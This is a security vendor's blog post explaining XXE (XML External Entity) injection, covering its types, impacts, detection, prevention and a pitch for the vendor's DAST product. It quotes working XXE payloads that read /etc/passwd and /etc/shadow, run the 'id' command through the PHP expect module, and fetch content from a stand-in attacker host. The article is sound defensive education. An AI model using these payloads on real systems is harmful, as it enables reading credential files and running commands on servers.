Product
Product overview

See how dev-centric DAST for the enterprise secures your business.

Web attacks

Continuous security testing for web applications at high-scale.

API attacks

Safeguard your APIs no matter how often you deploy.

Business logic attacks

Future-proof your security testing with green-flow exploitation testing.

LLM attacks

Next-gen security testing for LLM & Gen AI powered applications and add-ons.

Interfaces & extensions

Security testing throughout the SDLC - in your team’s native stack.

Integrations

Connecting your security stack & resolution processes seamlessly.

Docs

Getting started with Bright and implementing it in your enterprise stack.

Book a demo

We’ll show you how Bright’s DAST can secure your security posture.

Resources
Blog

Check out or insights & deep dives into the world of security testing.

Webinars & events

Upcoming & on-demand events and webinars from security experts.

Docs

Getting started with Bright and implementing it in your enterprise stack.

Case studies

Dive into DAST success stories from Bright customers.

Research

Download whitepapers & research on hot topics in the security field.

Company
About us

Who we are, where we came from, and our Bright vision for the future.

News

Bright news hot off the press.

Webinars & events

Upcoming & on-demand events and webinars from security experts.

We're hiring

Want to join the Bright team? See our open possitions.

Bug bounty

Found a security issue or vulnerability we should hear about? Let us know!

Contact us

Need some help getting started? Looking to collaborate? Talk to us.

Resources > Blog >
XXE Attacks: Types, Code Examples, Detection and Prevention

XXE Attacks: Types, Code Examples, Detection and Prevention

Admir Dizdar

What Is an XXE Attack?

XXE (XML External Entity Injection) is a web-based vulnerability that enables a malicious actor to interfere with XML data processes in a web application. 

It often enables visibility of the files on an application server’s file system and interacts with a backend or external system that the application itself has access to. In some scenarios, the attacker might take an XXE attack a step further by exploiting the XXE attack payload to implement SSRF (Server-Side Request Forgery) in order to compromise backend infrastructure, such as the underlying server.

In this article:

What Is the Impact of XXE Injections?

XXE injections can have significant impacts on organizations and individuals, including:

  • Data theft: XXE injections can allow attackers to extract sensitive data, such as passwords, confidential documents, or personal information, from a target system.
  • System compromise: XXE injections can be used to gain unauthorized access to systems and data, allowing attackers to execute malicious code, install malware, or steal sensitive data.
  • Denial of Service (DoS) attacks: XXE injections can be used to launch DoS attacks, overwhelming target systems and making them unavailable to users.
  • Reputation damage: XXE injections can result in the loss of sensitive data and the compromise of systems, which can damage an organization’s reputation and impact customer trust.
  • Increased risk of future attacks: XXE injections can create a foothold for attackers within a target system, making it easier for them to carry out additional attacks in the future.

Classification of XXE Attacks

There are several kinds of XXE attacks, including:

  • Billion Laughs Attack: This type of attack uses a maliciously constructed XML document that contains nested entity references to cause a buffer overflow and denial of service attack.
  • OOB (Out-of-Band) Data Retrieval: This attack allows an attacker to retrieve sensitive information from the target system by causing the XML parser to access external resources, such as files or network services, on behalf of the attacker.
  • Server-Side Request Forgery (SSRF): This type of attack is similar to OOB data retrieval but allows an attacker to send requests to internal network resources from the context of the target system, potentially allowing access to sensitive information or functionality.
  • Internal Entity Injection: This attack involves injecting internal entity definitions into an XML document, which can be used to interfere with the processing of XML data or extract sensitive information.
  • Blind XXE: This type of attack is similar to OOB data retrieval but doesn’t require the attacker to see the results of the attack. Instead, it relies on exploiting side-effects, such as causing a delay in processing time or consuming resources.

How Do XXE Attacks Work?

XML is an extremely popular format used by developers to transfer data between the web browser and the server. 

XML requires a parser, which is often where vulnerabilities are introduced. XXE enables the attacker to define entities defined based on the content of a URL or file path. When the server reads the XML attack payload, it parses the external entity, merges it into the final document, and returns it to the user with the sensitive data inside. 

XXE attacks can also be leveraged by an attacker to perform an SSRF attack and compromise the server.

Learn more in our detailed guide to xxe prevention.

XXE Attack Examples

Have a look at the examples below from our friends at OWASP:

Accessing a Local Resource that Might Return an Error

<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM  "file:///dev/random" >]>
<foo>&xxe;</foo>

Related content: Read our guide to xxe attack.

Remote Code Execution (RCE)

If fortune is on our side, and the PHP “expect” module is loaded, we can get RCE. Let’s modify the payload

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
  [<!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
  <user>`&xxe;`</user>
  <pass>`mypass`</pass>
</creds>

Disclosing /etc/passwd or Other Target Files

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>

How to Detect XXE Attacks

Detection of XXE attacks can be performed in a few ways:

  • Manually: This involves manually reviewing XML input files, server logs, and network traffic to identify any potential XXE attacks. This can be challenging because it requires expertise in understanding how XML parsers work and the various types of XXE attacks, as well as a good understanding of the specific system being monitored.
  • Using SCA tools: Static Code Analysis (SCA) tools can be used to scan code and identify any potential XXE vulnerabilities before the code is deployed. These tools can help identify common patterns in code that could lead to XXE attacks and provide suggestions for remediation.
  • Code scanning in early development stages: Integrating code scanning into the development process can help identify XXE vulnerabilities early in the development lifecycle. This can reduce the risk of these vulnerabilities being exploited and minimize the potential impact of a successful attack.

Regardless of the method used, regular monitoring and testing is important to ensure that systems remain secure and free from XXE attacks.

XXE Attack Prevention

XXE vulnerabilities commonly appear in web applications because the library that parses XML supports XML features, which could be dangerous and are enabled by default. Disabling these features is the most straightforward and effective approach to preventing an XXE attack.

Disable external entities resolution and XInclude support either in the configuration or programmatically, by overriding the default behaviors. 

Testing for XXE

XXE attacks represent a serious risk to organizations. The good news is that they can be prevented easily by using and properly configuring a good XML parser, whilst ensuring input validation, proper error handling and minimizing filesystem permissions.

You can easily test your applications for XXE and other vulnerabilities with a modern DAST security scanner, whether integrated across your development pipelines to scan every build or merge to master or before you release them to production – Try Bright DAST for free to achieve just that.

Resources

DORA: Exploring The Path to Financial Institutions’ Resilience

DORA (Digital Operational Resilience Act) is the latest addition to the EU regulatory arsenal. A framework designed to bolster the cyber resilience of financial entities operating within the EU. But let’s face it: there’s no lack of regulations issued by the European Union legislature, and they’re not exactly known for keeping things light and easy.

IASTless IAST – The SAST to DAST Bridge

Streamline appsec with IASTless IAST. Simplify deployment, enhance accuracy, and boost your security posture by combining SAST and Bright’s DAST.

Bringing DAST security to AI-generated code

AI-generated code is basically the holy grail of developer tools of this decade. Think back to just over two years ago; every third article discussed how there weren’t enough engineers to answer demand; some companies even offered coding training for candidates wanting to make a career change. The demand for software and hardware innovation was

Get our newsletter